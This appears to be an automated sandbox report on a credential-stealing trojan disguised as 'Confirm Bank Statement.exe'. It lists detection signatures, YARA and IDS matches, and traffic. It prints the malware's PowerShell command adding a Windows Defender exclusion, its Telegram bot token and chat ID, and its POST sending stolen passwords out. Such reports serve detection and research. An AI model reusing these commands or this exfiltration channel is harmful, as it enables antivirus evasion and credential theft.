Windows Analysis Report
Confirm Bank Statement.exe

Overview

General Information

Sample name: Confirm Bank Statement.exe
Analysis ID: 1590892
MD5: d16a155d98d41cf4109fc2ebe34c0ab4
SHA1: 93176aab1ccb1db112204c4860405bb9bffa1c9b
SHA256: e5eab0d46a0a0500431f1ef78dd03c8dc17b97794f558624dfa7a567e24245e1
Tags: exe, user-James_inthe_box
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Confirm Bank Statement.exe (PID: 5980 cmdline: "C:\Users\user\Desktop\Confirm Bank Statement.exe" MD5: D16A155D98D41CF4109FC2EBE34C0AB4)
    • powershell.exe (PID: 4512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Confirm Bank Statement.exe (PID: 4244 cmdline: "C:\Users\user\Desktop\Confirm Bank Statement.exe" MD5: D16A155D98D41CF4109FC2EBE34C0AB4)
{"C2 url": "https://api.telegram.org/bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E", "Telegram Chatid": "1780630805"}
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | |
| 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | |
| 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | 0x2d747:$a1: get_encryptedPassword; 0x2da6f:$a2: get_encryptedUsername; 0x2d4e2:$a3: get_timePasswordChanged; 0x2d603:$a4: get_passwordField; 0x2d75d:$a5: set_encryptedPassword; 0x2f0b9:$a7: get_logins; 0x2ed6a:$a8: GetOutlookPasswords; 0x2eb5c:$a9: StartKeylogger; 0x2f009:$a10: KeyLoggerEventArgs; 0x2ebb9:$a11: KeyLoggerEventArgsEventHandler |
| 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 0.2.Confirm Bank Statement.exe.7240000.6.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.2.Confirm Bank Statement.exe.3431648.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.2.Confirm Bank Statement.exe.41d3150.3.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | |
| 0.2.Confirm Bank Statement.exe.41d3150.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 0.2.Confirm Bank Statement.exe.41d3150.3.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirm Bank Statement.exe", ParentImage: C:\Users\user\Desktop\Confirm Bank Statement.exe, ParentProcessId: 5980, ParentProcessName: Confirm Bank Statement.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", ProcessId: 4512, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirm Bank Statement.exe", ParentImage: C:\Users\user\Desktop\Confirm Bank Statement.exe, ParentProcessId: 5980, ParentProcessName: Confirm Bank Statement.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", ProcessId: 4512, ProcessName: powershell.exe
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2025-01-14T16:43:35.509681+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49729 | 149.154.167.220 | 443 | TCP |
| 2025-01-14T16:43:28.173614+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49701 | 132.226.8.169 | 80 | TCP |
| 2025-01-14T16:43:34.454787+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49701 | 132.226.8.169 | 80 | TCP |
| 2025-01-14T16:43:35.111519+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.7 | 49729 | 149.154.167.220 | 443 | TCP |

AV Detection

Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E", "Telegram Chatid": "1780630805"}
Source: Confirm Bank Statement.exe.4244.4.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendMessage"}
Source: Confirm Bank Statement.exe, Virustotal: Detection: 31%
Source: Confirm Bank Statement.exe, ReversingLabs: Detection: 42%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Confirm Bank Statement.exe, Joe Sandbox ML: detected

Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: Confirm Bank Statement.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49705 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49729 version: TLS 1.2
Source: Confirm Bank Statement.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic, Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49729 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49729 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
Source: unknown, DNS query: name: api.telegram.org
Source: unknown, DNS query: name: checkip.dyndns.org
Source: unknown, DNS query: name: reallyfreegeoip.org
Source: global traffic, DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic, DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: Joe Sandbox View, IP Address: 132.226.8.169
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: POST /bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780630805&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd34884aef51fe
    Host: api.telegram.org
    Content-Length: 1088
    Connection: Keep-Alive
Source: unknown, HTTP traffic detected: POST /bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780630805&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd34884aef51fe
    Host: api.telegram.org
    Content-Length: 1088
    Connection: Keep-Alive
Source: unknown, Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: C:\Users\user\Desktop\Confirm Bank Statement.exe, Process Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028740984_2_02874098
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028740A84_2_028740A8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C0CF4_2_0287C0CF
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028708DF4_2_028708DF
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C0D84_2_0287C0D8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028708F04_2_028708F0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287001F4_2_0287001F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287B81F4_2_0287B81F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287B8284_2_0287B828
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028700404_2_02870040
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E0684_2_0287E068
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E0784_2_0287E078
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287118F4_2_0287118F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C9884_2_0287C988
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028711A04_2_028711A0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287F1D74_2_0287F1D7
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287F1D84_2_0287F1D8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E9274_2_0287E927
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E9284_2_0287E928
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C97F4_2_0287C97F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287D68B4_2_0287D68B
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287D6904_2_0287D690
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287A6C74_2_0287A6C7
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287A6C84_2_0287A6C8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02879E174_2_02879E17
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02879E184_2_02879E18
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287F6204_2_0287F620
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287F6304_2_0287F630
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028737E84_2_028737E8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028737F84_2_028737F8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02872F434_2_02872F43
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02872F484_2_02872F48
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287AF734_2_0287AF73
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287BC804_2_0287BC80
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287048A4_2_0287048A
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028704984_2_02870498
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E4CB4_2_0287E4CB
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287E4D04_2_0287E4D0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287DC114_2_0287DC11
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287DC204_2_0287DC20
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02873C4F4_2_02873C4F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02873C504_2_02873C50
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287BC7F4_2_0287BC7F
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287ED804_2_0287ED80
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287CDD04_2_0287CDD0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287CDE04_2_0287CDE0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_028715EA4_2_028715EA
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C5204_2_0287C520
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287C5304_2_0287C530
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02870D3A4_2_02870D3A
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_02870D484_2_02870D48
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_0287ED7F4_2_0287ED7F
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000000.1251186568.0000000000D1E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamewenA.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1267719440.0000000003011000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1267719440.0000000003011000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1275355456.0000000007787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1267719440.000000000313C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1276008487.0000000008DE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1265141545.00000000012BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1274255090.0000000007240000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3718084114.00000000008F7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3717562282.000000000041A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe Binary or memory string: OriginalFilenamewenA.exe< vs Confirm Bank Statement.exe
                    Source: Confirm Bank Statement.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
